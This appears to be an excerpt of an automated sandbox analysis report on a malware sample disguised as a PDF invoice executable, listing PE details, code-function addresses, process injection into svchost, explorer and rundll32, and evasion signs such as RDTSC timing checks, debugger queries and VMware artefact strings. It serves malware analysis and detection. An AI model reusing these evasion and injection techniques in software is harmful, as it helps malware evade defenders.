          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1669851309.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670101325.0000000004210000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1672216614.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673809619.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.000000000349E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1739113966.0000000004B95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1734729766.00000000049E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1669851309.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670101325.0000000004210000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1734632822.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1672216614.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673809619.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.000000000349E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.1739113966.0000000004B95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1734729766.00000000049E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: svchost.exe, 00000001.00000003.1733882556.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733820601.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734555328.0000000002FE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4129174165.0000000000C20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000001.00000003.1733882556.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733820601.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734555328.0000000002FE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129174165.0000000000C20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4141763780.00000000110CF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130564299.000000000528F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129438375.0000000003142000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4141763780.00000000110CF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130564299.000000000528F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129438375.0000000003142000.00000004.00000020.00020000.00000000.sdmp
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007CC304 LoadLibraryA,GetProcAddress,0_2_007CC304
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0075C590 push eax; retn 0075h0_2_0075C599
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B8719 push FFFFFF8Bh; iretd 0_2_007B871B
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077E94F push edi; ret 0_2_0077E951
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077EA68 push esi; ret 0_2_0077EA6A
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00778B85 push ecx; ret 0_2_00778B98
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077EC43 push esi; ret 0_2_0077EC45
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077ED2C push edi; ret 0_2_0077ED2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041C843 push eax; retf 1_2_0041C846
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417078 push ds; ret 1_2_00417079
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041DC69 push 22826EB8h; iretd 1_2_0041DC7D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D475 push eax; ret 1_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D4C2 push eax; ret 1_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D4CB push eax; ret 1_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041648D push esi; retf 1_2_0041648E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416CAF push ebp; retf 1_2_00416CB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D52C push eax; ret 1_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165E4 push ecx; iretd 1_2_004165E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD push ecx; mov dword ptr [esp], ecx1_2_033309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029EEB1E push esp; retn 0000h1_2_029EEB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029EEB02 push esp; retn 0000h1_2_029EEB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029EE9B5 push esp; retn 0000h1_2_029EEAE7
          Source: C:\Windows\explorer.exeCode function: 2_2_0E617B02 push esp; retn 0000h2_2_0E617B03
          Source: C:\Windows\explorer.exeCode function: 2_2_0E617B1E push esp; retn 0000h2_2_0E617B1F
          Source: C:\Windows\explorer.exeCode function: 2_2_0E6179B5 push esp; retn 0000h2_2_0E617AE7
          Source: C:\Windows\explorer.exeCode function: 2_2_10D289B5 push esp; retn 0000h2_2_10D28AE7
          Source: C:\Windows\explorer.exeCode function: 2_2_10D28B1E push esp; retn 0000h2_2_10D28B1F
          Source: C:\Windows\explorer.exeCode function: 2_2_10D28B02 push esp; retn 0000h2_2_10D28B03
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C26883 push ecx; ret 3_2_00C26896
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C2682D push ecx; ret 3_2_00C26840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D427FA pushad ; ret 3_2_04D427F9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D4225F pushad ; ret 3_2_04D427F9
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeFile created: \genesis rms private limited november 2024 pdf.exe
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeFile created: \genesis rms private limited november 2024 pdf.exeJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00754A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00754A35
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007D55FD
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007733C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007733C7
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeAPI/Special instruction interceptor: Address: 18D3264
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 2C49904 second address: 2C4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 2C49B6E second address: 2C49B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1282Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8651Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 889Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 860Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 2265Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 7707Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98712
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeAPI coverage: 4.6 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.1 %
          Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.0 %
          Source: C:\Windows\explorer.exe TID: 8064Thread sleep count: 1282 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 8064Thread sleep time: -2564000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 8064Thread sleep count: 8651 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 8064Thread sleep time: -17302000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7904Thread sleep count: 2265 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7904Thread sleep time: -4530000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7904Thread sleep count: 7707 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 7904Thread sleep time: -15414000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007B4696
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BC93C FindFirstFileW,FindClose,0_2_007BC93C
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007BC9C7
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF200
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF35D
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BF65E
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3A2B
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3D4E
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BBF27
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00754AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00754AFE
          Source: explorer.exe, 00000002.00000002.4135822231.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000000.1691972906.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000002.00000000.1691972906.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000002.00000002.4135822231.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
          Source: explorer.exe, 00000002.00000002.4129302361.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000003.3105810680.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000002.00000000.1691972906.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000002.00000003.3107468764.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3107468764.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4134891449.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000003.3105810680.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000002.00000002.4132184132.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000002.00000002.4134788894.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000002.00000002.4129302361.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000002.00000002.4129302361.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040ACE0 LdrLoadDll,1_2_0040ACE0
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007C41FD BlockInput,0_2_007C41FD
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00753B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00753B4C
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00785CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00785CCC
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007CC304 LoadLibraryA,GetProcAddress,0_2_007CC304
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_018D3530 mov eax, dword ptr fs:[00000030h]0_2_018D3530
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_018D34D0 mov eax, dword ptr fs:[00000030h]0_2_018D34D0
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_018D1E70 mov eax, dword ptr fs:[00000030h]0_2_018D1E70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C310 mov ecx, dword ptr fs:[00000030h]1_2_0332C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350310 mov ecx, dword ptr fs:[00000030h]1_2_03350310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]1_2_0336A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]1_2_0336A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]1_2_0336A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D437C mov eax, dword ptr fs:[00000030h]1_2_033D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov ecx, dword ptr fs:[00000030h]1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]1_2_033B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA352 mov eax, dword ptr fs:[00000030h]1_2_033FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D8350 mov ecx, dword ptr fs:[00000030h]1_2_033D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]1_2_033B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]1_2_03328397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]1_2_03328397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]1_2_03328397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]1_2_0332E388
